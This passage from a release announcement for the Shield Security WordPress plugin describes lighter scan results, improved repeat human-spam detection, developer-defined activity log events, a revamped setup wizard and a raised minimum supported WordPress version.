Shield’s scans can turn up a lot of results and some customers have reported trouble on some servers with limited resources.

We’ve redesigned how the scan results are built, so it’s faster and lighter on both your browser and the WordPress server.

#6 Improved Human SPAM Detection

After working with a customer on some issues she faced with Human SPAM, we’ve developed enhancements to how Shield will detect repeated human spam comments.

For example, a SPAMer may post a comment and trigger our human SPAM scanner. But then they’ll fire off more comments which might bypass the same scanner. We’ll now use previous SPAM detections by Shield to inform future comments, too.

We also squashed a bug where Shield wasn’t properly honouring the “disallowed keywords” option built into WordPress itself.

#7 Custom Activity Logs and Events

Shield covers a lot of areas when it comes to monitoring events that happen on a WordPress site. But we typically don’t cover 3rd party plugins.

So, based on the feedback from a number of interested customers, we’ve added the ability for any PHP developer to add custom events to Shield’s Activity Logs.

When might you find that useful?

You could, for example, track WooCommerce orders, or you could be facing a particularly menacing visitor that repeats an undesireable action on your site that’s not covered by Shield, and decide to block their IP.

You can do whatever you want with this, though you should always take care when allocating offenses to actions as you may inadvertently block legitimate users.

#8 All-New Guided Setup Wizard

When first installing a platform like Shield Security for WordPress, it can be a little overwhelming. Shield is a large plugin, with many features, tools and options.

We’ve had a “Welcome Wizard” in Shield for a while, but it was a little rough around the edges. For this release we decided to revamp it and provide a new guided setup wizard, helping newcomers get up-to-speed more quickly.

Anyone can access the Guided Setup from the Super Search Box (search: “Wizard”), or from the Shield > Tools menu.

A Change To Minimum Supported WordPress Version

We try to make Shield Security as backward-compatible as possible, while it makes sense to do so.

However, this means that our code development and testing must reflect this and means that the burden of support increases the farther back we support older versions.

Our Telemetry data suggests that there are no WordPress sites below version 4.7 running the Shield plugin. Of course, we can only go on what data has been sent to us. But we have to draw the line somewhere, and with Shield v16, we’re drawing the line at WordPress 4.7.

As more data comes through and time marches on, we’ll gradually increase our minimum requirements so we strongly suggest you keep your WordPress sites, and hosting platforms as up-to-date as possible.

Comments, Feedback and Suggestions

A lot of work has gone into this release that will, we hope, improve security for all users by making it much easier to see what’s going on and what areas need improved. The Security Rules Engine is one of our most exciting developments to-date and we can hardly wait to get the first iteration into your hands and start further development on it.

As always, we welcome your thoughts and feedback so please do feel free to leave your comments and suggestions below.

Source :
https://getshieldsecurity.com/blog/wp-shield-security-pro-release-16-1/